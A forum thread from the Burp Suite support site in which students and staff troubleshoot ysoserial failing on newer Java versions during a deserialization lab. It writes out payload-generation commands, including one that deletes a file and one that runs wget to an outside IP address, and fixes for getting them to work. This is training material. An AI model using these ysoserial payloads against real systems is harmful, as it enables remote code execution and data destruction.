Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

ysoserial stopped working

Pietro | Last updated: Dec 07, 2021 10:34PM UTC

Hello. I already completed the lab "Exploiting Java deserialization with Apache Commons" weeks ago and now I wanted to do it again but it doesn't work because I get a java error when I execute ysoserial. Maybe it's because I installed the deserialization scanner plugin. I was looking its tab and I saw that it says: "recent Java major version does not allow to run ysoserial properly" so I don't know what to do. Hopefully somebody knows what could be happening. Thanks. The java error I get is: java -jar ysoserial.jar CommonsCollections4 'rm /home/carlos/morale.txt' | base64 Error while generating or serializing payload java.lang.IllegalAccessError: class ysoserial.payloads.util.Gadgets (in unnamed module @0xfe48b45) cannot access class com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl (in module java.xml) because module java.xml does not export com.sun.org.apache.xalan.internal.xsltc.trax to unnamed module @0xfe48b45 at ysoserial.payloads.util.Gadgets.createTemplatesImpl(Gadgets.java:102) at ysoserial.payloads.CommonsCollections4.getObject(CommonsCollections4.java:32) at ysoserial.payloads.CommonsCollections4.getObject(CommonsCollections4.java:26) at ysoserial.GeneratePayload.main(GeneratePayload.java:34)

Ben, PortSwigger Agent | Last updated: Dec 08, 2021 10:33AM UTC

Hi Pietro, Which version of Java are you using to run the ysoserial? I can replicate this if i use Java 16 or 17 but earlier versions seem to work as expected (I tested this successfully using Java versions 15 and 11).

Pietro | Last updated: Dec 08, 2021 02:39PM UTC

Thanks for your help. I'm using Java 17.0.1. I'm almost sure that I have not updated my java since I completed this lab for the first time. What should I do? Downgrade?

Uthman, PortSwigger Agent | Last updated: Dec 09, 2021 10:53AM UTC

Mihai | Last updated: May 17, 2022 11:16PM UTC

Hello, How can I download ysoserial.jar for this lab? And do I need java in order to run this tool? If yes how can I download and install java, please? I do not have experience with java, worked more in python, thank you!

Ben, PortSwigger Agent | Last updated: May 18, 2022 11:11AM UTC

Hi, Ysoserial is available for download here: https://github.com/frohoff/ysoserial As noted in the message above yours in this forum thread, you can obtain Java from the location below: https://jdk.java.net/archive/ The GitHub page also has a usage guide.

AlvinSmith | Last updated: Feb 14, 2023 09:16AM UTC

Hi Pietro and who else are worrying about using different version, Check this answer on stackoverflow: https://askubuntu.com/questions/740757/switch-between-multiple-java-versions ```bash ❯ java -jar ysoserial-all.jar CommonsBeanutils1 'wget 10.10.14.7' | base64 -w 0 Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true Error while generating or serializing payload java.lang.IllegalAccessError: class ysoserial.payloads.util.Gadgets (in unnamed module @0x4015e7ec) cannot access class com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl (in module java.xml) because module java.xml does not export com.sun.org.apache.xalan.internal.xsltc.trax to unnamed module @0x4015e7ec at ysoserial.payloads.util.Gadgets.createTemplatesImpl(Gadgets.java:102) at ysoserial.payloads.CommonsBeanutils1.getObject(CommonsBeanutils1.java:20) at ysoserial.GeneratePayload.main(GeneratePayload.java:34) ❯ java --version Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true openjdk 17.0.6 2023-01-17 OpenJDK Runtime Environment (build 17.0.6+10-Debian-1) OpenJDK 64-Bit Server VM (build 17.0.6+10-Debian-1, mixed mode, sharing) ❯ update-java-alternatives --list java-1.11.0-openjdk-amd64 1111 /usr/lib/jvm/java-1.11.0-openjdk-amd64 java-1.17.0-openjdk-amd64 1711 /usr/lib/jvm/java-1.17.0-openjdk-amd64 ❯ sudo update-java-alternatives --set /usr/lib/jvm/java-1.11.0-openjdk-amd64 ``` Cheers,

MiX_FiX | Last updated: Mar 07, 2023 11:38AM UTC

Hello everybody, Recently I have also completed lab with insecure deserialization, however now ysoserial showing me this: ~ % java -jar ysoserial-all.jar CommonsCollections4 "test" Error while generating or serializing payload java.lang.IllegalAccessError: class ysoserial.payloads.util.Gadgets (in unnamed module @0x4a16581b) cannot access class com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl (in module java.xml) because module java.xml does not export com.sun.org.apache.xalan.internal.xsltc.trax to unnamed module @0x4a16581b at ysoserial.payloads.util.Gadgets.createTemplatesImpl(Gadgets.java:102) at ysoserial.payloads.CommonsCollections4.getObject(CommonsCollections4.java:32) at ysoserial.payloads.CommonsCollections4.getObject(CommonsCollections4.java:26) at ysoserial.GeneratePayload.main(GeneratePayload.java:34) I have tried to install jdk few times, each time different version. I've tried to download new ysoserial.. nothing changed. I am using macOS (intel), kali linux (through virtual box) and nor mac nor kali wants to work. Please, help me..)

Ben, PortSwigger Agent | Last updated: Mar 08, 2023 07:50AM UTC

Hi, What versions of Java have you used when you attempt to run the ysoserial Jar file?

MiX_FiX | Last updated: Mar 09, 2023 11:28AM UTC

My dear sir or madam, Allow me to expound upon a matter that may be of great interest to you. Should you happen to be utilizing a macOS operating system, and have encountered an issue with the ysoserial program due to an error previously demonstrated, it would behoove you to note that ysoserial necessitates the utilization of Java 11 exclusively. In order to verify your Java version, kindly employ the following command: % java --version java 11.0.17 2022-10-18 LTS Java(TM) SE Runtime Environment 18.9 (build 11.0.17+10-LTS-269) Java HotSpot(TM) 64-Bit Server VM 18.9 (build 11.0.17+10-LTS-269, mixed mode) Subsequently, to determine which Java version is presently installed on your machine, kindly use the ensuing command: % /usr/libexec/java_home -V Matching Java Virtual Machines (5): 19.0.2 (x86_64) "Oracle Corporation" - "Java SE 19.0.2" /Library/Java/JavaVirtualMachines/jdk-19.jdk/Contents/Home 17.0.6 (x86_64) "Oracle Corporation" - "Java SE 17.0.6" /Library/Java/JavaVirtualMachines/jdk-17.jdk/Contents/Home 11.0.17 (x86_64) "Oracle Corporation" - "Java SE 11.0.17" /Library/Java/JavaVirtualMachines/jdk-11.0.17.jdk/Contents/Home 1.8.361.09 (x86_64) "Oracle Corporation" - "Java" /Library/Internet Plug-Ins/JavaAppletPlugin.plugin/Contents/Home 1.8.0_202 (x86_64) "Oracle Corporation" - "Java SE 8" /Library/Java/JavaVirtualMachines/jdk1.8.0_202.jdk/Contents/Home /Library/Java/JavaVirtualMachines/jdk-19.jdk/Contents/Home Upon completion of this step, you may select the appropriate Java version, which in our case would be Java 11.0.17, with the following command: % export JAVA_HOME=/usr/libexec/java_home -v 11.0.17 Et voilà! Your ysoserial program is now functioning as desired (one can only hope).

Nico | Last updated: Mar 22, 2023 06:09PM UTC

Hello, I would just like to mention that issue hasn't been fixed for recent java versions and creates great confusion when attempting to complete the practice exam using the ysoserial extension in burp suite.

Ben, PortSwigger Agent | Last updated: Mar 23, 2023 11:54AM UTC

Hi Nico, On a general note, we would expect users to already know how to use any external tools that they ultimately want to use during the exam (including how to set them up, pre-requisites etc).

Nico | Last updated: Apr 05, 2023 08:22AM UTC

Hey Ben, there are 250 exercises and as the original poster pointed out, updating your java version causes this particular exercise to break. You will continue to randomly get people reporting this bug, and ocasionally an angry exam taker. enjoy explaining it to them.

PortSwigger Agent | Last updated: Jun 05, 2023 09:16AM UTC

Hi, sorry for the delay, we will identify the best workaround for this issue and update the Academy learning materials to incorporate it.

PortSwigger Agent | Last updated: Jun 05, 2023 10:29AM UTC

You can make ysoserial work with modern Java for the gadget chains used in the Academy by specifying the following command line flags: --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED --add-opens java.base/java.net=ALL-UNNAMED --add-opens=java.base/java.util=ALL-UNNAMED eg: java --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED --add-opens java.base/java.net=ALL-UNNAMED --add-opens=java.base/java.util=ALL-UNNAMED -jar ysoserial-all.jar URLDNS https://collaborator-url-here/

Sharon | Last updated: Aug 22, 2023 03:06AM UTC

java --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED --add-opens java.base/java.net=ALL-UNNAMED --add-opens=java.base/java.util=ALL-UNNAMED -jar ysoserial-all.jar CommonsCollections4 'rm /home/carlos/morale.txt' | base64 The lab solution needs to be updated with the code above. I have spent over 1hr trying to resolve the ysoserial issue and this is the code that worked for me. You need to update the Academy, so current students don't get stuck or frustrated when they get to the deserialization lab.

Florian | Last updated: Aug 24, 2023 10:37AM UTC

I too spent over 1 hour figuring this out. The problem is that the lab *seems* to have the correct hint, listing the --ad-opens parameters, but if you look closely, they are in a different order. In the lab hint, it is listed as "java -jar --add-opens=xxx [...] ysoserial.jar". Notice that "-jar" is listed before the "--add-opens". This seems to conflict with ysoserial. If you change the order as mentioned by Portswigger Agent on Jun 05, ysoserial will work. It would be great if the labs get updated soon. After all, it's been a while since June 05...

Dominyque, PortSwigger Agent | Last updated: Aug 24, 2023 01:37PM UTC

Hi All We have had one of our users submit a video solution for this lab recently: https://www.youtube.com/watch?v=NAK_a324dco&list=PLGj3IZkhXGzL7SQII47kmo9OO3wsFPaVv&index=4 I hope this helps.

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.